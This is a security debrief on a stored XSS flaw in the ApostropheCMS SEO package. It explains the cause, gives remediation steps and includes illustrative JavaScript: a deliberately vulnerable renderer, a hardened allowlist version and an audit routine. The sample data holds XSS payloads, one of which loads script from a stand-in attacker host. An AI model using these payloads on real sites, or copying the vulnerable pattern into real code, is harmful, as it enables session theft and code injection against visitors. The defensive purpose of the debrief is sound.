PatchSiren cyber security CVE debrief
CVE-2026-53608 apostrophecms CVE debrief
ApostropheCMS is an open-source Node.js content management system. Versions up to and including 1.4.2 of the `@apostrophecms/seo` package interpolate unsanitized user input into inline `<script>` tag bodies through JavaScript template literals. Any user with editor-level access can therefore store arbitrary JavaScript that runs in the browser of every visitor on every page, a stored XSS. The vulnerability has a CVSS score of 8.7 and is classified as HIGH severity.
- Vendor: apostrophecms
- Product: @apostrophecms/seo
- CVSS: HIGH 8.7
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-06-12
- Original CVE updated: 2026-06-12
- Advisory published: 2026-06-12
- Advisory updated: 2026-06-12
Who should care
Operators of ApostropheCMS sites with the `@apostrophecms/seo` package installed, especially sites that grant editor-level access to accounts that are not fully trusted: a payload stored once by an editor executes for every visitor to the site.
Technical summary
The `@apostrophecms/seo` package takes two user-controlled fields, `seoGoogleTrackingId` and `seoGoogleTagManager`, and interpolates them directly into inline `<script>` bodies without validation or escaping. Because the values land inside script content rather than HTML text, a value can terminate the surrounding JavaScript string or the `<script>` element itself and continue with attacker-chosen code. Both fields can be set by any account with editor-level access, so the result is stored XSS. The expected values are short tracking identifiers, which makes an allowlist check against the identifier format the natural control.
Defensive priority
HIGH
Recommended defensive actions
- Upgrade `@apostrophecms/seo` to a release later than 1.4.2 (the advisory lists versions up to and including 1.4.2 as affected).
- Until the upgrade is in place, restrict editor-level access to trusted accounts, since editors can set the two affected fields.
- Audit stored content: review the `seoGoogleTrackingId` and `seoGoogleTagManager` values on existing pages for anything that is not a plain tracking identifier, and inspect the inline `<script>` rendered on live pages for unexpected content.
- Monitor for suspicious activity on the site, including unexpected changes to SEO fields.
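As an added illustration (not code from `@apostrophecms/seo` or the ApostropheCMS project), the following JavaScript shows the vulnerable pattern described in the technical summary beside a hardened renderer, plus a small audit routine that serves the "audit stored content" and "monitor" actions above. The two field names come from the advisory; the renderer layout, the identifier regexes, and the sample documents are assumptions made for illustration.

```javascript
// Added example for this debrief; it is not code from @apostrophecms/seo.
// The field names seoGoogleTrackingId and seoGoogleTagManager come from the
// advisory. The renderer shape, the ID regexes, and the sample documents are
// assumptions made for illustration.

// VULNERABLE pattern: an editor-controlled value is dropped straight into an
// inline <script> body through a template literal. Nothing stops the value
// from closing the JS string, the statement, or the <script> element.
function renderTrackingVulnerable(page) {
  return `<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('config', '${page.seoGoogleTrackingId}');
</script>`;
}

// Allowlist of identifier shapes the snippet can legitimately use.
// Assumed from publicly documented formats (UA-nnnn-n, G-xxxx, GTM-xxxx);
// tighten or extend to match your own integration.
const ID_PATTERNS = {
  seoGoogleTrackingId: /^(UA-\d{4,10}-\d{1,4}|G-[A-Z0-9]{4,16})$/,
  seoGoogleTagManager: /^GTM-[A-Z0-9]{4,12}$/,
};

// Returns the trimmed value if it matches the field's pattern, else null.
function validateTrackingId(field, value) {
  const re = ID_PATTERNS[field];
  if (!re || typeof value !== 'string') return null;
  const v = value.trim();
  return re.test(v) ? v : null;
}

// Defence in depth for the render step: emit the value as a JS string
// literal with "</" (which would end the <script> element) and the line
// separators U+2028/U+2029 escaped. This is a second layer behind the
// allowlist, not a substitute for it.
function toScriptStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// HARDENED renderer: omit the snippet entirely when the stored value is
// not a valid identifier, instead of rendering whatever was stored.
function renderTrackingSafe(page) {
  const id = validateTrackingId('seoGoogleTrackingId', page.seoGoogleTrackingId);
  if (id === null) return '';
  return `<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('config', ${toScriptStringLiteral(id)});
</script>`;
}

// Audit helper for the "audit" and "monitor" actions: given already-stored
// documents, list every SEO field whose value is not a plain identifier so
// the content (and the account that saved it) can be reviewed.
function auditSeoFields(docs) {
  const findings = [];
  for (const doc of docs) {
    for (const field of Object.keys(ID_PATTERNS)) {
      const value = doc[field];
      if (value === undefined || value === null || value === '') continue;
      if (validateTrackingId(field, value) === null) {
        findings.push({ _id: doc._id, field, value });
      }
    }
  }
  return findings;
}

// Constructed sample documents (not real site data).
const SAMPLE_DOCS = [
  { _id: 'home', seoGoogleTrackingId: 'G-ABC123DEF4', seoGoogleTagManager: 'GTM-ABC1234' },
  { _id: 'about', seoGoogleTrackingId: "'); alert(document.cookie); //" },
  { _id: 'blog', seoGoogleTagManager: '</script><script src=//attacker.invalid/x.js></script>' },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderTrackingVulnerable(SAMPLE_DOCS[1]));   // payload passes straight through
  console.log(renderTrackingSafe(SAMPLE_DOCS[1]) === '' ? '[snippet omitted]' : 'unexpected');
  console.log(auditSeoFields(SAMPLE_DOCS));                // two findings: about, blog
}
```

The audit routine is the same allowlist applied in reverse: anything already stored that the hardened renderer would refuse is worth a look, because on an unpatched install it has been executing for every visitor since it was saved.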
Evidence notes
The vulnerability is confirmed by the CVE record and the NVD detail page. A security advisory is available on the ApostropheCMS GitHub page [ref-4].
Official resources
- CVE-2026-53608 CVE record (CVE.org)
- CVE-2026-53608 NVD detail (NVD)
- Source item URL: nvd_modified
- Source reference: CVE-2026-53608 was published on 2026-06-12T22:16:52.660Z and has not been modified since then.